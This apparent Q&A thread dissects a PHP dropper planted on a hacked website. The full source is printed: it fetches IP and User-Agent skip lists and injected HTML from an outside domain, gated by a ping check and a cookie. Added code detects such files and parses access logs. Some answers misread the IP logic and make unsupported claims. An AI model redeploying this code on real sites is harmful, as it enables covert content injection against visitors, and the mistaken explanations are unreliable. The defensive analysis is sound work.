Reputation: 155
EDIT: Good work all so far.
I've just found this being downloaded and run in my bash history:
(safe to view)
Thanks all
I've just noticed the source PHP of my site has been edited. I've no idea how (I've changed all my passwords since) but what really confuses me is why.
In a couple of pages there was an iframe placed, linking to an xml.php file which was placed in my images directory (the only directory accessible by HTACCESS). This code MUST have been hand placed as the pages are fairly complex and to auto place without breaking these pages would have been near impossible.
Now the REALLY confusing thing is the contents of this XML.php file, as from what I can see it does nothing.
Here's the code:
<?php
$urlIps  = "http://mp3magicmag.com/frame/ips.txt";   // URL of the IP list (ranges to skip)
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // URL of the HTML to inject
$urlUa   = "http://mp3magicmag.com/frame/ua.txt";    // URL of the User-Agent list (strings to skip)

// Health check for the operator: ?ping answers and stops
if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}

$ip = $_SERVER['REMOTE_ADDR'];
// cut the address down to its range: keep the first three octets (a /24)
$exIps = explode(".", $ip);
$ip = $exIps[0].".".$exIps[1].".".$exIps[2];
$ips = file_get_contents($urlIps);
// the leading space keeps a match at offset 0 from reading as false
if(strpos(" ".$ips, $ip)){ // if the IP range is found in the file, stop the process
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // if a listed string is found in the User-Agent, stop the process
        die;
    }
}

if(isset($_COOKIE['pingshell'])){ // check whether the cookie exists
    // second request: fetch the remote HTML and output it inside the iframe (errors suppressed)
    echo @file_get_contents($urlHtml);
}else{
    // first request: set the cookie client-side, then reload the same URL after 2 seconds
?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
    document.cookie = name + "=" + escape(value) +
        ((expires) ? "; expires=" + expires : "") +
        ((path) ? "; path=" + path : "") +
        ((domain) ? "; domain=" + domain : "") +
        ((secure) ? "; secure" : "");
}
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">
<?php
}
?>
Am I missing something, or is this the strangest "hack" ever?? I've done my googling and can't find any reference to it happening before.
Upvotes: 7
Views: 681
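The two artefacts described in the question (a hand-placed iframe pointing at a .php file in the images directory, and a dropped file that fetches remote content and gates it on ?ping, IP, User-Agent and a cookie) are easy to hunt for across a whole site tree. The following Python scanner is an added example, not code from the original post; the files it scans are constructed inline, and the attribute values on the injected iframe (width and height of 0) are an assumption, since the post does not show the tag itself.

```python
"""Hunt a PHP site tree for the two artefacts in the post: a hidden or
out-of-place <iframe>, and a dropped file that fetches remote content and
gates it on a cookie, ?ping or User-Agent check.  Added example; the file
contents in SITE are constructed for illustration."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# <iframe ... src="..."> with attributes in any order
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.I)
# zero-size or invisible frame
HIDDEN_RE = re.compile(
    r'(?:width|height)\s*=\s*["\']?0(?:px)?["\']?(?!\d)|display\s*:\s*none|visibility\s*:\s*hidden', re.I)
# a .php served from a directory that should only hold static images/uploads
IMG_PHP_RE = re.compile(r'(?:^|/)(?:images?|img|uploads?)/[^/?#]*\.php(?:[?#]|$)', re.I)

# Hallmarks of the dropped file; each regex is one marker, several together is the signal
MARKERS = {
    "remote_fetch": re.compile(r'\b(?:file_get_contents|file|fopen|curl_init)\s*\(\s*(?:\$\w+|["\']https?://)'),
    "ping_check":   re.compile(r"\$_GET\s*\[\s*['\"]ping['\"]\s*\]"),
    "cookie_gate":  re.compile(r"\$_COOKIE\s*\[\s*['\"][^'\"]+['\"]\s*\]"),
    "ua_filter":    re.compile(r"HTTP_USER_AGENT"),
    "ip_filter":    re.compile(r"REMOTE_ADDR"),
    "meta_refresh": re.compile(r'http-equiv\s*=\s*["\']refresh["\']', re.I),
}


@dataclass
class Finding:
    path: str
    kind: str                     # "injected_iframe" | "cloaking_dropper"
    detail: str
    markers: List[str] = field(default_factory=list)


def suspicious_iframes(html: str) -> List[str]:
    """src of every iframe that is hidden or loads a .php from an images/uploads dir."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        tag, src = m.group(0), m.group(1)
        if HIDDEN_RE.search(tag) or IMG_PHP_RE.search(src):
            hits.append(src)
    return hits


def cloaking_markers(php: str) -> List[str]:
    return [name for name, rx in MARKERS.items() if rx.search(php)]


def looks_like_cloaking_dropper(php: str) -> bool:
    """A remote fetch, plus a cookie or ping gate, plus at least one more marker."""
    found = set(cloaking_markers(php))
    return "remote_fetch" in found and bool(found & {"cookie_gate", "ping_check"}) and len(found) >= 3


def scan_site(files: Dict[str, str]) -> List[Finding]:
    findings: List[Finding] = []
    for path, content in files.items():
        for src in suspicious_iframes(content):
            findings.append(Finding(path, "injected_iframe", f"iframe src={src}"))
        if path.lower().endswith(".php") and looks_like_cloaking_dropper(content):
            findings.append(Finding(path, "cloaking_dropper",
                                    "fetches remote content gated on cookie/ping",
                                    cloaking_markers(content)))
    return findings


# Constructed site tree (not the poster's real files); the iframe attributes are an assumption.
SITE = {
    "index.php": (
        '<html><body><h1>Welcome</h1>\n'
        '<iframe src="/images/xml.php" width="0" height="0" frameborder="0"></iframe>\n'
        "<?php include 'footer.php'; ?></body></html>"
    ),
    "about.php": '<html><body><iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe></body></html>',
    "footer.php": "<?php echo file_get_contents(__DIR__ . '/footer.html'); ?>",
    "images/xml.php": (
        '<?php\n$urlHtml = "http://example.invalid/frame/html.code";\n'
        "if(isset($_GET['ping'])){ echo 'Status: Ping successful!'; die; }\n"
        "if(strpos(' '.$_SERVER['HTTP_USER_AGENT'], 'bot')){ die; }\n"
        "if(isset($_COOKIE['pingshell'])){ echo @file_get_contents($urlHtml); }\n"
        'else { echo \'<meta http-equiv="refresh" content="2; url=">\'; }\n'
    ),
}

if __name__ == "__main__":
    for f in scan_site(SITE):
        print(f"{f.path}: {f.kind} ({f.detail}) {f.markers}")
```

Run it against a real tree by building the dict from `os.walk` over the webroot; a legitimate iframe (the YouTube embed) and a legitimate local `file_get_contents` are left alone, while the zero-size frame into the images directory and the cookie-gated remote fetch are both reported.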
Reputation: 20602
Right, what it does is as follows.
1. Checks whether the request carried the ping parameter; if it did, it replies and terminates.
2. Checks the visitor's IP address against the list fetched from ips.txt.
3. Checks the visitor's User-Agent against the list fetched from ua.txt.
4. If the pingshell cookie has been set previously then the HTML file is downloaded and displayed to the browser.
5. Otherwise sets the pingshell cookie to a dummy value, valid for the entire domain.
Step 4 is the important bit, it looks like a proxy server to retrieve the HTML at the location given. If the link is illegal, then it's not good. Probably for marketing purposes though, they can use your URL to serve their content and get your users' click-through data.
Having said that, the code only allows any form of access from prescribed IP addresses, so unless they are capturing that information first, it seems like it is designed for specific use by specific people.
Upvotes: 5
Reputation: 963
Make sure you have safe mode enabled in your php.ini to avoid such scripts opening remote unsafe files.
Upvotes: 1
Reputation: 3621
Looks like part of an automated script. This would be used to confirm that the auto-attack was successful, and to rank up a big list of places to return to. Among other things. (Jonah Bron brings up some other things)
EDIT
What you can do is gut the code and monitor calls to the file in a log. See what someone tries to do with it.
Upvotes: 2
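Following the suggestion above to gut the file and watch who calls it, the access log is where that evidence lands. The following Python script is an added example, not part of the answer; it parses Apache combined-format lines (constructed here, using RFC 5737 documentation addresses), separates the operator's ?ping health checks from real visitors, counts repeat hits (the visitor comes back two seconds later via the meta refresh, so a second hit means the remote HTML was actually served), and uses the Referer header to list which of the site's pages carry the iframe. The path /images/xml.php and the log format are assumptions.

```python
"""Pull every request for the dropped file out of an Apache combined-format
access log and separate the operator's ?ping health checks from real visitors.
Added example; the lines in SAMPLE_LOG are constructed (RFC 5737 addresses)."""
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(line: str) -> Optional[dict]:
    """One combined-format line -> dict with path/query split out, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    parts = urlsplit(e["target"])
    e["path"] = parts.path
    e["query"] = parse_qs(parts.query)
    e["size"] = 0 if e["size"] == "-" else int(e["size"])
    return e


def summarize(lines: List[str], dropped_path: str = "/images/xml.php") -> Dict[str, object]:
    hits = [e for e in map(parse_combined, lines) if e and e["path"] == dropped_path]
    pings = [e for e in hits if "ping" in e["query"]]
    visitors = [e for e in hits if "ping" not in e["query"]]
    visitor_ips = Counter(e["ip"] for e in visitors)
    return {
        "total_hits": len(hits),
        # whoever sends ?ping is checking that the dropped file is still live
        "ping_checkers": Counter(e["ip"] for e in pings),
        "visitor_ips": visitor_ips,
        # first hit sets the cookie, the meta refresh triggers a second hit that gets the payload
        "served_payload_ips": sorted(ip for ip, n in visitor_ips.items() if n >= 2),
        # the Referer on a visitor hit is the page that embeds the iframe
        "embedding_pages": Counter(e["referer"] for e in visitors if e["referer"] != "-"),
        "visitor_user_agents": Counter(e["ua"] for e in visitors),
    }


# Constructed log excerpt, not the poster's real log.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2010:09:12:01 +0000] "GET /images/xml.php?ping=1 HTTP/1.1" 200 25 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [10/Mar/2010:09:15:44 +0000] "GET /images/xml.php HTTP/1.1" 200 612 "http://www.example.com/index.php" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
198.51.100.23 - - [10/Mar/2010:09:15:46 +0000] "GET /images/xml.php HTTP/1.1" 200 4102 "http://www.example.com/index.php" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
198.51.100.88 - - [10/Mar/2010:09:20:02 +0000] "GET /images/xml.php HTTP/1.1" 200 612 "http://www.example.com/about.php" "Mozilla/5.0 (Macintosh) Safari/533"
198.51.100.5 - - [10/Mar/2010:09:21:10 +0000] "GET /images/logo.png HTTP/1.1" 200 8123 "http://www.example.com/index.php" "Mozilla/5.0 (X11; Linux) Chrome/5.0"
203.0.113.7 - - [10/Mar/2010:10:12:01 +0000] "GET /images/xml.php?ping=1 HTTP/1.1" 200 25 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{key}: {dict(value) if isinstance(value, Counter) else value}")
```

The ping_checkers set is the one worth keeping: those addresses belong to whoever planted the file and they come back on a schedule, so they are the ones to block at the firewall and to search for in the rest of the logs around the time the pages were modified.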
Reputation: 10091
Looks like they want to use your site to broaden their cookie tracking system. The "Status: ping successful" thing looks like a function for them to check the integrity of their hack periodically. It also sends the IP addresses of all of your visitors to their server.
Upvotes: 0